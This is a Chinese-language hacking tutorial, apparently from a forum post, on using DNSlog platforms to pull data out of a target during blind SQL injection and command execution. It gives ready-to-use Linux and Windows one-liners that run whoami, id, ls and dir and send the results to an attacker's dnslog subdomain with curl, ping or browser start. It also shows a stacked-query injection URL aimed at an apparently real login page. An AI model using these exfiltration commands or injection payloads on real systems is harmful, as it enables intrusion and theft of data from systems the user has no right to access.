黑客协会：DNSlog黑客攻击技巧

黑客协会：DNSlog黑客攻击技巧

这个字符注入点经过测试，只支持bool型注入和延时注入(可多行sql语句执行)。

这两种注入类型的缺点就是速度慢，效率低，一个是基于对错判断数据，一个是基于访问时间来判断数据，dnslog的出现就正好弥补了这样的缺陷。

说到这里我不得不吐槽一下，cloudeye作为一个dnslog平台已经关门大吉了却不把web服务器关掉，让我误以为是我操作不当导致收不到日志，后来用的另外一个dnslog平台。。

请点击此处输入图片描述

linux：

curl http://xxx.dnslog.link/`whoami`ping -c 1 `whoami`.xxx.dnslog.link

如果碰到内容有空格（换行符等），就会截断，只输出前面的，这时候可以利用编码来输出，但有输出字符数最大限制；curl http://xxx.dnslog.link/$(id|base64)

碰到ls这类多个输出的命令，直接使用脚本；for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;

windows：

利用HTTP请求：for /F %x in ('whoami') do start http://xxx.dnslog.link/%x将结果使用默认浏览器弹出；

利用DNS请求：

获取计算机名：for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link获取用户名：for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 不能编码输出，但利用powershell可以实现； dir有/b参数，不显示修改日期等信息，只显示文件名，所以可以弹出；for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg

ping一下，看看dns日志里会不会出现cmdtest.xxxxxxxx.dnslog.link域名的日志，经过查看确实已经收到，由于日志清空了一次 当时没截图，就不复现再截图了。

然后有个问题，就是命令回显的问题。

传统的做法的创建一个两个字段的表，然后吧每次执行cmd 的结果都插入到表里，要查看的时候再取出来。

于是我

http://xxxx.xxxx.com.cn/Login.ashx?Id=123';create table tmptmp(tmp1 varchar(1024),tmp2 varchar(1024));

但是我发现表却创建不成功，不知道是何原因。这里有另外一个过于麻烦的思路，那就是把所有的表结构都跑出来，然后找一个能插入cmd结果的表，将返回结果插入到那张表里。

但是凡事都要找最优解。。于是我想了另一个办法：

将一个命令的执行结果作为另一个命令的参数，就比如，先执行whoami拿到结果，然后ping whoami的结果.xxxxxxxx.dnslog.link 这样就可以把结果放到子域名里通过dns日志拿到了。。